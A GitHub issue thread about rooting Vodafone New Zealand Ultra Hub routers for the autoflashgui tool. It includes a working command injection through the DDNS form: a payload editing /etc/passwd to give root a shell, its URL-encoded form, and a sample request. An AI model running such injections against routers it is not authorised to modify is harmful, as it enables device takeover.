-
Notifications
You must be signed in to change notification settings - Fork 17
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
[ENHANCEMENT] Add support for VANT-9 and VBNT-Z (Vodafone Ultra Hub & Ultra Hub Plus) from New Zealand #28
Comments
Line: variant=DGA0130VDF Vodafone 17.1.7988 (root) Advanced DDNS,AdvancedDDNS,www.DynDNS.org,sleep 30; this is where I'm at currently |
Tested On firmware: RC2.4.6_prod_AUTH_vant-9_17.1.7988-2461009-20180510014336.rbi / 17.1.7988-2461009-CRF846-V2.4.6 sed -i 's#root:/bin/false#root:/bin/ash#' /etc/passwd;echo Y or formatted for injection %3Bsed+-i+'s#root:%2Fbin%2Ffalse#root:%2Fbin%2Fash#'+%2Fetc%2Fpasswd%3Becho+Y DDNS Request: ddnsStatus=1&ddnsService=dyndns.org&ddnsDomain=test.com&ddnsUsrname=user&ddnsPswrd=pass&securedns=0&action=SAVE&CSRFtoken=a1a717126289a0062708bc3396761d3a4ed94b2b0abdd3b84089bd7de07b46b2 DDNS RESPONSE: HTTP/1.1 200 OK { "status":"success" } |
There is a working fork for VANT-9 here now: https://github.com/jameskeenan295/autoflashgui |
Did some more testing today and noticed a few interesting points about the rooting process through ddns command injection.
Rooting process is working reliably now for both router models, using default ssh port 22. To keep things simple for merging the fork back into mswhirls code later I've removed the http server component of the AFG fork, and updated defaults.ini with two new entries: Recommendations are: Or: you must use: defaultInterCommandDelay=30 Some other minor changes to libautoflashgui.py: |
Discussion & commands here: hack-technicolor/hack-technicolor#68
@mswhirl - let us know if this would be reasonably easy, or quite a bit of work?
If it helps, I can send you a wireshark trace of the login process, firmware flash form post/response, and DDNS form post/responses? And some screenshots
The text was updated successfully, but these errors were encountered: